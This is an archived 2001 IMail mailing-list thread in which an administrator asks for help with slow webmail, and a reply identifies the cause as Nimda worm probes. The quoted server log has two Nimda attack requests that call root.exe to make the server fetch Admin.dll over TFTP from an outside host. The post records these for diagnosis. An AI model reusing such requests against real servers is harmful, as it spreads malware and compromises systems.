You are being probed by the nimda virus/worm.
You have your web mail working on port 80. It is quite common for any
web server to be probed.
Many of us are getting thousands of these probes.
-----Original Message-----
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]] On Behalf Of Charles Short
Sent: Friday, September 21, 2001 9:15 AM
To: [EMAIL PROTECTED]
Subject: [IMail Forum] DoS Attack on IMail Web Messaging?? HELP!
Hello,
I know this message is long, but I called Ipswitch Support twice on
Wednesday about a problem I am having with my IMail Server and the phone
support I have gotten has not addressed my issue here and I need all the
help I can get right now. I am running 7.03 HF1 on NT4 Server with SP6a.
I am only running IMail on this machine. No IIS or other server
programs.
�
We started seeing problems on Tuesday like everyone else, but we are
running IMail on a server by itself... No IIS. I am seeing a lot of
malformed header requests in the logs like the Code Red I & II virus
does to IIS servers and -- this is the odd part -- some BRO*.tmp files
in my spool directory that are most definitely being caused by people
browsing WebMail. It is causing web messaging to crawl, but other than
that I have not seen what everyone else seems to be seeing with the
Nimda virus. No other characteristics of the Nimda virus at all. I
honestly do not believe that we have been infected...
�
Here is a snippet from the logs...
------------------------------
20010918 111401 208.180.242.21, , , GET
/scripts/root.exe?/c+tftp%20-i%20208.180.242.21%20GET%20Admin.dll%20Admi
n.dll HTTP/1.0
20010918 111401 208.234.121.72, , , GET
/MSADC/root.exe?/c+tftp%20-i%20208.234.120.89%20GET%20Admin.dll%20Admin.
dll HTTP/1.0
910.350.7976 fax
Please visit http://www.ipswitch.com/support/mailing-lists.html
to be removed from this list.
An Archive of this list is available at:
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
